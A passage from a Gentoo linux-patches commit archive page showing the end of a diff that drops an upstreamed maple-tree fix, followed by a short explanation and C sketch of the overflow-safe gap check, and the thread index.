- 		min = mas_safe_min(mas, pivots, offset);
- 	}
- 
--	if (unlikely(index > max)) {
--		mas_set_err(mas, -EBUSY);
--		return false;
--	}
-+	if (unlikely((mas->index > max) || (size - 1 > max - mas->index)))
-+		goto no_space;
- 
- 	if (unlikely(ma_is_leaf(type))) {
- 		mas->offset = offset;
-@@ -4961,9 +4958,11 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
- 	return false;
- 
- ascend:
--	if (mte_is_root(mas->node))
--		mas_set_err(mas, -EBUSY);
-+	if (!mte_is_root(mas->node))
-+		return false;
- 
-+no_space:
-+	mas_set_err(mas, -EBUSY);
- 	return false;
- }
- 
--- 
-cgit 
-


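The removed (now upstreamed) fix hinges on one overflow-safe comparison:
size - 1 > max - mas->index rejects a gap that cannot hold size slots
without ever computing mas->index + size - 1, which could wrap near
ULONG_MAX. A stand-alone sketch of that check, with hypothetical names:

#include <limits.h>
#include <stdbool.h>
#include <stdio.h>

/* does the inclusive range [lo, hi] hold at least "size" slots? */
static bool gap_fits(unsigned long lo, unsigned long hi, unsigned long size)
{
	if (lo > hi || size == 0)
		return false;
	/* equivalent to lo + size - 1 <= hi, but cannot wrap */
	return size - 1 <= hi - lo;
}

int main(void)
{
	printf("%d\n", gap_fits(10, 19, 10));			/* 1: exact fit */
	printf("%d\n", gap_fits(10, 19, 11));			/* 0: too big   */
	printf("%d\n", gap_fits(ULONG_MAX - 4, ULONG_MAX, 5));	/* 1: no wrap   */
	return 0;
}
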
^ permalink raw reply related	[flat|nested] 30+ messages in thread

end of thread, other threads:[~2023-05-17 13:17 UTC | newest]

Thread overview: 30+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2023-03-11 14:08 [gentoo-commits] proj/linux-patches:6.2 commit in: / Mike Pagano
  -- strict thread matches above, loose matches on Subject: below --
2023-05-17 13:17 Mike Pagano
2023-05-11 16:11 Mike Pagano
2023-05-11 14:48 Mike Pagano
2023-05-10 17:52 Mike Pagano
2023-05-10 16:08 Mike Pagano
2023-04-30 23:50 Alice Ferrazzi
2023-04-26 13:21 Mike Pagano
2023-04-20 11:15 Alice Ferrazzi
2023-04-13 16:08 Mike Pagano
2023-04-06 10:40 Alice Ferrazzi
2023-03-30 21:52 Mike Pagano
2023-03-30 11:20 Alice Ferrazzi
2023-03-29 23:09 Mike Pagano
2023-03-22 16:10 Alice Ferrazzi
2023-03-22 12:44 Mike Pagano
2023-03-21 13:32 Mike Pagano
2023-03-17 10:42 Mike Pagano
2023-03-13 11:30 Alice Ferrazzi
2023-03-11 11:19 Mike Pagano
2023-03-10 12:37 Mike Pagano
2023-03-03 13:02 Mike Pagano
2023-03-03 12:27 Mike Pagano
2023-02-27 18:45 Mike Pagano
2023-02-27  3:48 [gentoo-commits] proj/linux-patches:6.2-2 " Alice Ferrazzi
2023-02-25 11:14 ` [gentoo-commits] proj/linux-patches:6.2 " Alice Ferrazzi
2023-02-26 17:30 Mike Pagano
2023-02-26 17:26 Mike Pagano
2023-02-25 11:02 Alice Ferrazzi
2023-02-19 22:41 Mike Pagano
2023-02-19 22:39 Mike Pagano

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox